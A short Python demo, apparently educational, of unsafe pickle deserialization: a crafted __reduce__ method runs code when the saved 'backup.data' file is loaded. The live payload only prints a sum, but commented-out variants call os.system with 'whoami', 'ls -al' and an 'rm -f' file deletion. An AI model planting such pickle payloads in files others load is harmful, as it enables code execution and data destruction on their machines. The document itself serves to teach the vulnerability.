############################################
#example of unsafe de-serialization
import pickle
import os

#1. creating a Evil class which has our malicious payload command (‘whoami’)
class EvilPickle(object):
   #def __reduce__(self):
       #exec('print("Hello Exec")')
       #return os.system, ('ls',)
       #return (os.system, ('whoami', ))

 def __reduce__(self):
       #cmd = ('rm -f h://IDrive/pickle-tests/ex1/test.txt')
       #cmd = ('ls -al')
       #cmd = (eval('print("Hello Exec")'))
       #return os.system, (cmd,)
       return exec, ('a = 7\nb = 10\nprint("Sum = ", a + b)', )
       
#2. serializing the malicious class
pickle_data = pickle.dumps(EvilPickle())
#storing the serialized output into a file in current directory
with open("backup.data", "wb") as file:
   file.write(pickle_data)

#3. reading the malicious serialized data and de-serializing it
with open("backup.data", "rb") as file:
   pickle_data = file.read()
   my_data = pickle.loads(pickle_data)

###########################################